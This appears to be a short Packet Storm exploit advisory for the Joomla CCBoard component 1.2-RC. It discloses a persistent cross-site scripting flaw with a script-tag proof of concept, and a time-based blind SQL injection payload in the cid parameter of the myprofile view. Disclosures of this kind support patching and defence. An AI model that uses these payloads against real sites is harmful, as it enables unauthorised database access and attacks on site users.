The Joomla CCBoard component version 1.2-RC suffers from cross site scripting and remote blind SQL injection vulnerabilities.
0fb77e2f573bebce8ae1ae906fa6dcfb59ce6485c5c6bbd6a25b4774a0d597dc# Exploit Title: Joomla Component com_ccboard Multiple Vulnerabilities
# Date: 13 Nov 2010
# Author: jdc
# Category: webapps/0day
# Version: 1.2-RC
# Download: http://codeclassic.org/the-downloads/joomla-extensionscomponents/292-ccboard-bulletin-board-forum.html
Persistent XSS
--------------
ccBoard doesn't filter its posts for HTML... at all:
<script>prompt(1)</script>
Blind SQL Injection
-------------------
NOTE: must be logged in
?option=com_ccboard
&view=myprofile
&cid=63 and benchmark(5000000,md5(1))
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed